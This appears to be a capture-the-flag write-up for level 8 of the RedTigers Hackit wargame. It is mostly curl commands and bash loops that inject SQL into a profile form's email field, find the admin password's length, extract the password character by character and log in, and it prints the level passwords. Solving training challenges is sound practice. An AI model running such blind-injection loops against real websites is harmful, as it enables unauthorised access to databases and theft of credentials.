# RedTigers Hackit wargame: Level 8


# curl --silent --insecure --cookie-jar level8 --cookie level8 --request POST --data "password=4d4f4f636f774d454f57636174&level8login=Login" https://redtiger.dyndns.org/hackit/level8.php
                <b>Welcome to Level 8</b><br><br>
                Target: Get the password of the admin.<br><br><br>

                Username: Admin<br>
                <form method="POST">
                        Email: <input type="text" name="email" value="hans@localhost"> <br>
                        Name: <input type="text" name="name" value="Hans"> <br>
                        ICQ: <input type="text" name="icq" value="12345"> <br>
                        Age: <input type="text" name="age" value="25"> <br>
                        <input type="submit" name="edit" value="Edit">
                </form>
                                <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# for i in `seq 1 20`; do email="' or length(password)='$i"; result=`curl --silent --insecure --cookie level8 --request POST --data "email=$email&edit=Edit" https://redtiger.dyndns.org/hackit/level8.php | grep email | grep 1`; if [ "$result" != "" ]; then echo $i; break; fi; done
18
# for i in `seq 1 18`; do for j in `echo {a..z} {0..9}`; do email="' or left(right(password,$[19-$i]),1)='$j"; result=`curl --silent --insecure --cookie level8 --request POST --data "email=$email&edit=Edit" https://redtiger.dyndns.org/hackit/level8.php | grep email | grep 1`; if [ "$result" != "" ]; then echo -n "$j"; break; fi; done; done; echo
7468656d65616e696e676f666c6966653432
# curl --silent --insecure --cookie level8 --request POST --data "user=Admin&password=7468656d65616e696e676f666c6966653432&login=Login" https://redtiger.dyndns.org/hackit/level8.php | grep is:
<br>The password for the next level is: <b>736c61705f7468655f6c616d65727a</b> <br><br>

No comments: